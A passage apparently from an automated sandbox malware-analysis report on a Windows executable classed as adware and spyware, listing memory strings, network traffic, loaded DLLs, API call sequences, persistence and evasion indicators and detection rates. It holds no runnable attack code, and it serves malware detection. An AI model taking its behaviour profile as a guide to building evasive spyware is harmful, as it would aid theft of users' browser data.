        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/U
        Source: nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://c.microsoftstart.cn/c.gif
        Source: nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://c.microsoftstart.com/c.gif
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://c.msn.com/
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://c.msn.com/K
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3286553261.000000000B6C3000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3278061822.00000000046AE000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://c.msn.com/c.gif?rnd=1735914359600&udc=true&pg.n=startpage&pg.t=hp&pg.c=&pg.p=prime&rf=&tp=ht
        Source: nv8401986_110422.exe, 00000000.00000002.3297552533.000000000CD40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://c.msn.com/c.gifhttps://c.msn.cn/c.gif
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cc.bingj.com/cache.aspx?q=
        Source: nv8401986_110422.exe, 00000000.00000002.3283626284.0000000008F00000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2052305080.000000000BCAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cc.bingj.com/cache.aspx?q=--disable-features%3dOptimizationGuideModelDownloading%2cOptimizat
        Source: nv8401986_110422.exe, 00000000.00000003.2016577008.000000000081D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.googl
        Source: nv8401986_110422.exe, 00000000.00000003.2017309772.0000000000847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/web
        Source: nv8401986_110422.exe, 00000000.00000003.2016666986.0000000000823000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017309772.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
        Source: nv8401986_110422.exe, 00000000.00000003.2017194964.0000000000881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore/
        Source: nv8401986_110422.exe, 00000000.00000003.2017309772.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoref
        Source: nv8401986_110422.exe, 00000000.00000003.2017309772.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreo0
        Source: nv8401986_110422.exe, 00000000.00000003.2017194964.0000000000881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
        Source: nv8401986_110422.exe, 00000000.00000003.2016666986.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
        Source: nv8401986_110422.exe, 00000000.00000003.2016577008.0000000000823000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2016666986.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx~
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/
        Source: nv8401986_110422.exe, 00000000.00000002.3297552533.000000000CD40000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.js
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.jsD
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.jsL
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.jsP
        Source: nv8401986_110422.exe, 00000000.00000002.3297885994.000000000CD8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.jsa
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.jsctor/1.0?cors=true&content-type=application/x-json-stream
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.jsownl
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.jstandard
        Source: nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla
        Source: nv8401986_110422.exe, 00000000.00000003.2017117414.000000000084A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla(
        Source: nv8401986_110422.exe, 00000000.00000003.2017117414.000000000084A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
        Source: nv8401986_110422.exe, 00000000.00000003.2017117414.000000000084A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
        Source: nv8401986_110422.exe, nv8401986_110422.exe, 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
        Source: nv8401986_110422.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
        Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknown | HTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.5:49727 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 18.244.18.122:443 -> 192.168.2.5:49725 version: TLS 1.2
        Source: C:\Users\user\Desktop\nv8401986_110422.exe | Code function: 0_2_004AA100 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_004AA100
        Source: C:\Users\user\Desktop\nv8401986_110422.exe | Code function: 0_2_004AA940 GetKeyState,GetKeyState,GetKeyState,GetKeyState,lstrlenW,lstrlenW,lstrlenW,0_2_004AA940

        Spam, unwanted Advertisements and Ransom Demands

        Source: Yara match | File source: 0.2.nv8401986_110422.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: nv8401986_110422.exe PID: 768, type: MEMORYSTR
        Source: C:\Users\user\Desktop\nv8401986_110422.exe | Code function: 0_2_0048BDF0 GetProcAddress,RtlInitializeCriticalSection,__Init_thread_footer,RtlEnterCriticalSection,LoadLibraryA,GetProcAddress,RtlLeaveCriticalSection,NtProtectVirtualMemory,_strstr,_strstr,0_2_0048BDF0
        Source: C:\Users\user\Desktop\nv8401986_110422.exe | Code function: 0_2_0048F380: DeviceIoControl,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,0_2_0048F380
        Source: nv8401986_110422.exe, 00000000.00000000.2014677397.00000000005A5000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSEMzf vs nv8401986_110422.exe
        Source: nv8401986_110422.exe, 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSEMzf vs nv8401986_110422.exe
        Source: nv8401986_110422.exeBinary or memory string: OriginalFilenameSEMzf vs nv8401986_110422.exe
        Source: nv8401986_110422.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: nv8401986_110422.exeStatic PE information: Section: UPX1 ZLIB complexity 0.9907210500616777
        Source: classification engineClassification label: mal100.adwa.spyw.evad.winEXE@1/81@12/3
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00483970 GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle,0_2_00483970
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00410800 GetProcAddress,GetProcAddress,GetProcAddress,SHGetPathFromIDListW,FindFirstFileW,CoInitialize,CoCreateInstance,_wcsrchr,_wcschr,CoUninitialize,FindNextFileW,FindClose,0_2_00410800
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0046A5B0 GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,LoadCursorW,RegisterClassExW,GetModuleHandleW,CreateWindowExW,GetModuleHandleW,FindResourceW,GetModuleHandleW,SizeofResource,GetModuleHandleW,LoadResource,FreeResource,0_2_0046A5B0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile created: C:\Users\user\AppData\Roaming\GlobalMgr.dbJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMutant created: \Sessions\1\BaseNamedObjects\ATL:MemData03EAnv8401986_110422.exe
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile created: C:\Users\user\AppData\Local\Temp\~DF258EEC8E43A49788.TMPJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: nv8401986_110422.exeVirustotal: Detection: 87%
        Source: nv8401986_110422.exeReversingLabs: Detection: 86%
        Source: nv8401986_110422.exeString found in binary or memory: aow-install-apk-100.xml
        Source: nv8401986_110422.exeString found in binary or memory: aow-install-apk.xml
        Source: nv8401986_110422.exeString found in binary or memory: vdi-install-apk-100.xml
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile read: C:\Users\user\Desktop\nv8401986_110422.exeJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: msimg32.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: version.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: dhcpcsvc.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: webio.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: winnsi.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: devobj.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: msasn1.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: linkinfo.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: ieframe.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: netapi32.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: wkscli.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: d3d9.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: dwmapi.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: d3d10warp.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: dataexchange.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: d3d11.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: dcomp.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: dxgi.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: twinapi.appcore.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: msiso.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: slc.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: sppc.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: wininet.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: slc.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: sppc.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: mshtml.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: powrprof.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: umpdc.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: fwpuclnt.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: rasapi32.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: rasman.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: rtutils.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: secur32.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: windowscodecs.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: textshaping.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: srpapi.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: mlang.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: jscript9.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: dhcpcsvc6.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: schannel.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: msimtf.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: resourcepolicyclient.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: d2d1.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: dwrite.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: dxcore.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: textinputframework.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: coreuicomponents.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: coremessaging.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: ntmarta.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: coremessaging.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: mskeyprotect.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: ntasn1.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: dpapi.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: gpapi.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: netprofm.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: ncrypt.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: ncryptsslp.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: npmproxy.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: xmllite.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: imgutil.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: winmm.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: policymanager.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: msvcp110_win.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: profext.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: windowscodecsext.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: mscms.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: coloradapterclient.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: icm32.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: napinsp.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: pnrpnsp.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: wshbth.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: nlaapi.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Section loaded: winrnr.dll
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
        Source: C:\Users\user\Desktop\nv8401986_110422.exe File written: C:\ProgramData\roundinfo.ini
        Source: nv8401986_110422.exe Static PE information: certificate valid
        Source: Binary string: #E:\654.pdb source: nv8401986_110422.exe, 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp
        Source: Binary string: E:\654.pdb source: nv8401986_110422.exe, nv8401986_110422.exe, 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_0046D180 LoadLibraryA,GetProcAddress, 0_2_0046D180
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_005149D5 push ecx; ret 0_2_005149E8
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_00514F26 push ecx; ret 0_2_00514F39
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_0BEF699B push esi; ret 0_2_0BEF69A3
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_0BEF7027 push esi; ret 0_2_0BEF702F
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_0BEF4B3A push cs; iretd 0_2_0BEF4B4F
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_0BF05A03 pushad ; retf 0_2_0BF05A09
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_0C91F167 push esp; retf 0_2_0C91F175
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_0CF068CD push ecx; retf 0_2_0CF068CE
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_0D7E242C pushad ; retf 0_2_0D7E2430
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_0D7E32D4 push eax; retf 0_2_0D7E32D5
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_0EC826E6 push esi; ret 0_2_0EC826E8
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_0EC82985 push esi; ret 0_2_0EC82987
        Source: initial sample Static PE information: section name: UPX0
        Source: initial sample Static PE information: section name: UPX1

        Persistence and Installation Behavior

        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: DeviceIoControl,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 0_2_0048F380
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: CreateFileW,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive%d 0_2_0048F7E0
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 0_2_0048F5E0
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_00406230 GetProcAddress,GetProcAddress,PathFileExistsA,GetProcAddress,PathFileExistsA,GetPrivateProfileSectionNamesA,GetPrivateProfileStringA,GetProcAddress,PathFileExistsA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetProcAddress,std::ios_base::_Ios_base_dtor, 0_2_00406230
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_004886E0 GetProcAddress,GetProcAddress,GetLocalTime,GetProcAddress,PathFileExistsA,SetFileAttributesA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,CreateFileA,CloseHandle,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA, 0_2_004886E0

        Boot Survival

        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: DeviceIoControl,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 0_2_0048F380
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: CreateFileW,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive%d 0_2_0048F7E0
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 0_2_0048F5E0
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_004546A0 MessageBoxA,ShowWindow,ShowWindow,IsIconic,ShowWindow, 0_2_004546A0
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_00445A50 KillTimer,KillTimer,KillTimer,MessageBoxA,KillTimer,KillTimer,KillTimer,PostMessageW,ShowWindow,ShowWindow,ShowWindow,IsIconic,ShowWindow, 0_2_00445A50
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_00449F60 GetWindowRect,GetWindowRect,IsIconic,SystemParametersInfoW,GetWindowRect,SystemParametersInfoW,SetWindowPos, 0_2_00449F60
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Code function: 0_2_00484290 GetModuleHandleW,GetProcAddress,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_wcsstr,_wcsstr,_wcsstr,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00484290
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\nv8401986_110422.exe Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0048BBD0 in eax, dx0_2_0048BBD0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: 4670000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: 5120000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: 6670000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: 6690000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: 69A0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: 8DA0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: 8F20000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: 8F60000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: A960000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: AB70000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: AC90000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B470000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B5F0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B610000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B650000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B670000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B780000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B830000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B800000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B940000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B960000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B9A0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B9E0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BA00000 memory commit | memory reserve | memory write watchJump to behavior
